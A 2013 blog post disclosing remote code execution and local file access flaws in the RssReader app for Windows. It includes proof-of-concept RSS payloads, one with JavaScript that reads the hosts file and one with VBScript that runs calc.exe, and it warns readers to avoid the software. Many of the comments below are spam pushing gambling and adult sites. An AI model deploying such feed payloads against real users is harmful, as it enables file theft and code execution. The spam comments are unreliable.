Wednesday, 26 June 2013

RssReader remote code execution vulnerability

Google Reader is officially shutting down on 1 July 2013. Not everyone has jumped ship yet, so I wouldn't be surprised to see a lot of people suddenly looking for new ways to read their RSS feeds next week.

Summary: Don't install RssReader! It's the top result on Google for "rss reader", but it also lets remote attackers steal your files and run arbitrary code on your computer. 

Several years ago, I discovered a remote code execution vulnerability in RssReader, a free RSS reader for Windows. To my amazement, this vulnerability is still present today. Even worse, this software is still the first result when you do a Google search for rss reader. I think this may result in quite a few installations of this vulnerable software next week, after Google Reader shuts down for good.


The latest stable release offered on the RssReader website is 1.0.88.0. This version was originally released way back in 2004! Unfortunately, for the past nine years, this version has contained a remote code execution vulnerability which allows malicious feeds to run arbitrary code on a victim's computer, or access the victim's files without consent.

 
The RssReader website reports more than 4.1 million downloads, but the real number is likely to be much higher, as that count does not appear to have been updated for more than two years (according to the archived pages at archive.org). 

Vulnerability 1: Accessing local files with JavaScript

RssReader executes JavaScript in a context that permits access to local files through an XMLHttpRequest object.  An attacker can instantiate an XMLHttpRequest object within a malicious, remote RSS feed and then use it to read any readable file from a victim's computer. The contents of these files can then be transmitted to the remote attacker without the victim's consent or knowledge.

Vulnerability 2: Executing code on the victim's computer with VBScript

Unsurprisingly, RssReader also allows VBScript to be executed in a local context by its rendering engine. A remote attacker can instantiate a WScript.Shell object and use it to execute arbitrary code on the victim's computer. When I originally tested this on a fully-patched Windows XP machine with Internet Explorer 7, it was possible to execute programs merely by viewing a malicious RSS feed. On Windows 7 with IE 10, the user may have to click "Yes" to run the ActiveX control, depending on their security settings.

Proofs of concept

The following RSS document demonstrates how the file c:\windows\system32\drivers\etc\hosts can be accessed through a remote feed.

<rss version="2.0">
  <channel>
    <title>Title</title>
    <link>http://www.example.com/</link>
    <description>Description</description>
    <generator>highseverity.com</generator>
    <item>
        <title>Item Title</title>
        <link>http://www.example.com/</link>
        <description>
         <script>
var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
xmlhttp.open("GET", "file:///c:/windows/system32/drivers/etc/hosts", true);
xmlhttp.onreadystatechange = function() {
    if (xmlhttp.readyState == 4) {
        alert(xmlhttp.responseText);
    }
}
xmlhttp.send(null);
         </script>
        </description>
        <author>highseverity.com</author>
    </item>
    </channel>
</rss>


When this feed is displayed within RssReader, the contents of the victim's hosts file will be displayed in a JavaScript alert dialog:



An attacker can also use the XMLHttpRequest object to send the contents of this file - plus other potentially sensitive files - to a remote web server. No user interaction is required, so a well-crafted attack is likely to go unnoticed by its victims.

Arbitrary programs can be executed on the victim's computer by creating a WScript.Shell object and calling its Run function. This can be demonstrated by creating a feed with the following script inside an RSS item:

<script language="VBScript">
<!--
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "calc.exe", 1, True
-->
</script>


When the victim views this feed, calc.exe will be executed:



As noted earlier, depending on the victim's operating system, browser version and security settings, this code execution vulnerability could also be exploited without requiring any user interaction, and a cleverly crafted attack is unlikely to be noticed by the victim.

Obviously, when a remote attacker is able to run arbitrary code on a victim's computer, it makes it a lot easier to gain unauthorised access to any of the victim's accounts on other sites and services, such as Facebook, Twitter, Gmail, Flickr, etc.

An attacker does not necessarily have to entice his victim into subscribing to a malicious feed; the vulnerability can also be exploited through a feed that the victim has already subscribed to, either by compromising the server hosting the feed, or by writing a specially-crafted blog post which is syndicated by other third-party feeds.

Mitigation

Unfortunately, RssReader does not appear to be maintained any more. The software has not been updated since 2004, the latest bugs listed on the website date from 2003, and emails to info@rssreader.com are being bounced. With that in mind, I'm surprised it's still the top result on Google for rss reader.

So for now, the only sensible thing to do is to avoid installing RssReader, and make sure everyone else avoids it, too!

It might appear reasonable and responsible for Google to place a warning in its search results, or perhaps even reduce its ranking in search results - particularly over the coming weeks.

39 comments:

  1. I m software developer and recently develope a RssReader remote code execution system for custom boxes Australia Brand and get too much benefits.

    ReplyDelete
  2. Amazing softwear share is great sharing for informative post. Thanks for sharing. You've get some good and quick services then go for it and get all services them.
    Custom Packaging solution

    ReplyDelete
  3. The G2 pool cleaner is the best robot pool cleaner for any family pool. Contrast it with other pool cleaners utilizing our Buyers Guide table. Additionally read about the top cleaners and which one is directly for your pool here.

    ReplyDelete
  4. We give you a 12 week home workout plan that works both for men and women which will help you achieve the results you want.

    ReplyDelete
  5. Dr. Ezekiel Akande is a humanitarian and is keen on clean vitality advancement in Africa particularly as it impacts the basic turn of events. A large portion of his innovative undertakings has been in clean vitality, man-made consciousness, huge information, and lodging improvement.

    ReplyDelete
  6. They effectively communicate service design firms, which supports a productive partnership.
    mobile app design agency

    ReplyDelete
  7. Thank you for posting such a great article! I found your website perfect for my needs. It contains wonderful and helpful posts. Keep up the good work!. Thank you for this wonderful Article! 토토사이트

    ReplyDelete
  8. I was very interested in the article. it’s quite inspiring I should admit. I like visiting you site since I always come across interesting articles like this one. 경마사이트

    ReplyDelete
  9. We have read your blog. It was really informative and we have collected much knowledge that has assisted me a lot. People can also visit our website… 바카라사이트

    ReplyDelete
  10. Before Commenting, I wanna say thank you for providing this great information. I feel too good to read it this awesome blog. Keep sharing this type of content. 사설토토

    ReplyDelete
  11. I really like your writing style, great information, thankyou for posting 룰렛

    ReplyDelete
  12. All your hard work is much appreciated. This content data gives truly quality and unique information. I’m definitely going to look into it. Really very beneficial tips are provided here and, Thank you so much. Keep up the good works.
    카지노사이트

    ReplyDelete
  13. Such an amazing and helpful post. I really really love it.
    바카라사이트

    ReplyDelete
  14. Its an amazing website, I really enjoy reading your articles.
    온라인카지노

    ReplyDelete
  15. I am contemplating this topic. I think you can solve my problems. My site is at "온라인카지노". I hope you can help me.

    ReplyDelete
  16. 메리트카지노14 December 2021 at 08:58

    Your writing is perfect and complete. 메리트카지노 However, I think it will be more wonderful if your post includes additional topics that I am thinking of. I have a lot of posts on my site similar to your topic. Would you like to visit once?


    ReplyDelete
  17. 바카라사이트10 January 2022 at 06:19

    You are really a genius. I also run a blog, but I don't have genius skills like you. However, I am also writing hard. If possible, please visit my blog and leave a comment. Thank you. 바카라사이트


    ReplyDelete
  18. Thanks for sharing. I found a lot of interesting information here. A really good post, very thankful and hopeful that you will write many more posts like this one. 야한동영상

    Please visit once. I leave my blog address below
    야설
    야한동영상

    ReplyDelete
  19. Amazing article. Your blog helped me to improve myself in many ways thanks for sharing this kind of wonderful informative blogs in live. I have bookmarked more article from this website. Such a nice blog you are providing. 일본야동

    Please visit once. I leave my blog address below
    한국야동
    일본야동

    ReplyDelete
  20. Personally I think overjoyed I discovered the blogs. Great post, thank you for sharing with us. 한국야동닷컴

    Please visit once. I leave my blog address below
    국산야동
    한국야동닷컴

    ReplyDelete
  21. Great Information sharing .. I am very happy to read this article .. thanks for giving us go through info. Fantastic nice. I appreciate this post. 국산야동

    Please visit once. I leave my blog address below
    야설
    국산야동

    ReplyDelete
  22. Hey very cool site!! Man .. Beautiful .. Amazing .. I will bookmark your blog and take the feeds also…I’m happy to find numerous useful information here in the post, we need work out more techniques in this regard, thanks for sharing. 중국야동넷

    Please visit once. I leave my blog address below
    야설
    중국야동넷

    ReplyDelete
  23. Many of you are aware of or have heard about the most popular and most well-known technology blogs that provide the most recent technology news gadgets, science, gadgets, and other exciting topics and offer helpful information to internet users. The greatest thing about this site is that you can look at videos related to recent technology news. It also receives more than 20 million unique visits and over six million social media users. Click here to find more details on the best tech news AtozTopNews.

    ReplyDelete
  24. Tamiloneindia is a movie blog dedicated to cinema, in particular its Art form. The blog aims to acquaint the viewers worldwide with the true purpose and potential of cinema, especially as a great source of learning and enlightenment, by trying to keep alive the cinematic gems that are rapidly fading into obscurity owing to commercialization.

    ReplyDelete
  25. Thanks for your marvelous posting! I quite enjoyed reading it, you can be a great author.I will remember to bookmark your blog and will often come back later in life. I want to encourage you to ultimately continue your great writing, have a nice weekend!Slot Pulsa

    ReplyDelete
  26. Thank you for another informative blog. Where else could I get that type of info written in such a perfect approach? I have an undertaking that I’m simply now working on, and I’ve been on the lookout for such information.pusat game slot

    ReplyDelete
  27. This is very educational content and written well for a change. It's nice to see that some people still understand how to write a quality post! bitmain antminer s19j pro

    ReplyDelete
  28. Grateful to you! Customary visits recorded here are the most straightforward technique to value your vitality, which is the reason why I am heading off to the site regular, hunting down new, intriguing data. Many, bless your heart! 파워볼사이트

    ReplyDelete
  29. Introductory You got a great blog .I assurance 메이저사이트

    ReplyDelete
  30. I have really enjoyed reading your blog post. Thank you for sharing. FM카지노가입

    ReplyDelete
  31. If possible, as you gain expertise, would you mind updating your blog with more information? It is extremely helpful for me 파워사다리

    ReplyDelete
  32. od, but look at the information at this address. 토토사이트

    ReplyDelete
  33. the blog stacks very quick for me on Chrome. Heavenly Blog! 먹튀검증업체

    ReplyDelete
  34. .Thanks for sharing and keep writing. 해외정식사이트

    ReplyDelete
  35. i am for the first time here. I found this board and I in finding It truly helpful & it helped me out a lot. I hope to present something back and help others such as you helped me. I am really enjoying reading your well written articles. It looks like you spend a lot of effort and time on your blog. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work. I would like to thank you for the efforts you have made in writing this article. I am hoping the same best work from you in the future as well. In fact your creative writing abilities has inspired me to start my own Blog Engine blog now. Really the blogging is spreading its wings rapidly. 안전놀이터주소

    ReplyDelete
  36. Thank you of this blog. That’s all I’m able to say. 카지노게임

    ReplyDelete